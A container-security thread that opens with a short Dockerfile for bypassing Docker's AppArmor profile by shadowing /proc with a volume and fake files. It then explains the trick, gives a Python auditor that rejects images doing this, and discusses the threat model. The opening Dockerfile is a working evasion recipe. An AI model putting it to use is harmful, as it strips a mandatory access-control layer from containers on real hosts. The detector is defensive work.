Docker apparmor bypass:

    FROM ubuntu:18.04
    # get rid of procfs
    VOLUME /proc
    # fake files to avoid fail on run
    COPY empty /proc/self/attr/exec
    COPY empty /proc/self/fd/4
    COPY empty /proc/self/fd/5
    COPY empty /proc/self/status
    # cmd will not have apparmor restrictions
    CMD YOUR_CMD
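The Dockerfile above works by declaring a volume over /proc, so the runtime's AppArmor profile-switch (which is written through /proc/self/attr/exec) has no real procfs to act on, and the pre-copied fake files keep the container from failing at start. A build-time or admission-time check that refuses images shadowing /proc is a cheap defensive control to pair with a patched runtime. The script below is an added example for this thread, not code from the tweet or from Docker/runc: it audits a Dockerfile (both shell and JSON-array instruction forms, with line continuations) and a `docker inspect`-style image config for volumes over /proc and COPY/ADD destinations inside it. The sample Dockerfile and config dict are constructed for the demonstration.

```python
"""Flag container images that declare a volume over /proc or copy files into it.

Added example for this thread (not the original tweet's code). The sample
Dockerfile and image config below are constructed inputs.
"""
import json
import re
import shlex

# Paths that must remain kernel-provided inside a container. Only /proc is
# listed because that is the path the thread is about; extend as policy requires.
SENSITIVE_ROOTS = ("/proc",)


def _under_sensitive(path):
    """True if path is one of SENSITIVE_ROOTS or anything beneath it."""
    norm = "/" + path.strip().strip("/")
    return any(norm == root or norm.startswith(root + "/") for root in SENSITIVE_ROOTS)


def _logical_lines(text):
    """Yield Dockerfile instructions with backslash continuations joined, comments dropped."""
    buf = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf.append(line[:-1].rstrip())
            continue
        buf.append(line)
        yield " ".join(buf)
        buf = []
    if buf:
        yield " ".join(buf)


def _args(rest):
    """Parse instruction arguments given in JSON-array form or shell form."""
    rest = rest.strip()
    if rest.startswith("["):
        try:
            parsed = json.loads(rest)
            if isinstance(parsed, list):
                return [str(p) for p in parsed]
        except ValueError:
            pass  # not valid JSON; fall through to shell-style splitting
    return shlex.split(rest)


def audit_dockerfile(text):
    """Return a list of (instruction, reason) findings for a Dockerfile string."""
    findings = []
    for line in _logical_lines(text):
        m = re.match(r"(\w+)\s+(.*)", line)
        if not m:
            continue
        instr, rest = m.group(1).upper(), m.group(2)
        if instr == "VOLUME":
            for path in _args(rest):
                if _under_sensitive(path):
                    findings.append((line, f"VOLUME shadows {path}"))
        elif instr in ("COPY", "ADD"):
            # Destination is the last argument; leading --flags such as --from are skipped.
            parts = [p for p in _args(rest) if not p.startswith("--")]
            if len(parts) >= 2 and _under_sensitive(parts[-1]):
                findings.append((line, f"{instr} writes into {parts[-1]}"))
    return findings


def audit_image_config(config):
    """Check a `docker inspect`-style dict (Config.Volumes) for volumes over /proc.

    Useful for images pulled from a registry, where no Dockerfile is available.
    """
    volumes = (config.get("Config") or {}).get("Volumes") or {}
    return sorted(v for v in volumes if _under_sensitive(v))


# Constructed sample mirroring the pattern discussed in the thread.
SAMPLE_DOCKERFILE = """\
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
COPY empty /proc/self/attr/exec
COPY empty \\
     /proc/self/status
CMD ["/bin/sh"]
"""

# Constructed `docker inspect` fragment for an already-built image.
SAMPLE_CONFIG = {"Config": {"Volumes": {"/proc": {}, "/data": {}}}}


if __name__ == "__main__":
    for instr, reason in audit_dockerfile(SAMPLE_DOCKERFILE):
        print(f"REJECT: {reason}  ({instr})")
    for vol in audit_image_config(SAMPLE_CONFIG):
        print(f"REJECT: image declares volume over {vol}")
```

Run it as a CI gate on Dockerfiles and as an admission check on `docker inspect` output before a pulled image is allowed to start; a non-empty result should fail the build or block the run.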
The same situation could be created with a malicious Ubuntu install on a VM, or on bare metal with SAN storage. It is an Ubuntu problem, and it requires insider access or running VMs or container images blindly.
Docker/runc are designed to run untrusted images, with SELinux or AppArmor providing an extra layer of protection against some exploits, like the recent runc /proc/self/exe one. Plenty of container PaaSes allow customers to build and run custom images. Dangerous, but common.